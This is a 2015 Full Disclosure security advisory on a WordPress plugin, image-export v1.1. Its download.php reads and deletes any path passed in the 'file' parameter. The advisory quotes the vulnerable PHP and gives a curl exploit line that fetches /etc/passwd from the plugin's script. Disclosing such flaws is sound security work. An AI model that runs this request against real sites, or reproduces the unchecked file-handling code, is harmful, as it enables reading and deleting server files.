[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[FD] Remote file download vulnerability in Wordpress Plugin image-export v1.1
- To: Open Source Security <oss-security@xxxxxxxxxxxxxxxxxx>
- Subject: [FD] Remote file download vulnerability in Wordpress Plugin image-export v1.1
- From: "Larry W. Cashdollar" <larry0@xxxxxx>
- Date: Mon, 13 Jul 2015 19:20:50 -0400
Title: Remote file download vulnerability in Wordpress Plugin image-export v1.1
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-01
Download Site: https://wordpress.org/plugins/image-export
Vendor: www.1efthander.com
Vendor Notified: 2015-07-05
Vendor Contact: https://twitter.com/1eftHander
Description: Image Export plugin can help you selectively download images
uploaded by an administrator .
Vulnerability:
The code in file download.php doesn't do any checking that the user is
requesting files from the uploaded images directory only. And line 8 attempts
to
unlink the file after being downloaded. This script could be used to delete
files out of the wordpress directory if file permissions allow.
1 <?php
2 if ( isset( $_REQUEST['file'] ) && !empty( $_REQUEST['file'] ) ) {
3 $file = $_GET['file'];
4
5 header( 'Content-Type: application/zip' );
6 header( 'Content-Disposition: attachment; filename="' . $file .
'"' );
7 readfile( $file );
8 unlink( $file );
9
10 exit;
11 }
12 ?>
CVEID: TBD
Exploit Code:
• $ curl
http://example.com/wp-content/plugins/image-export/download.php?file=/etc/passwd
Screen Shots:
Advisory: http://www.vapid.dhs.org/advisory.php?v=135
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/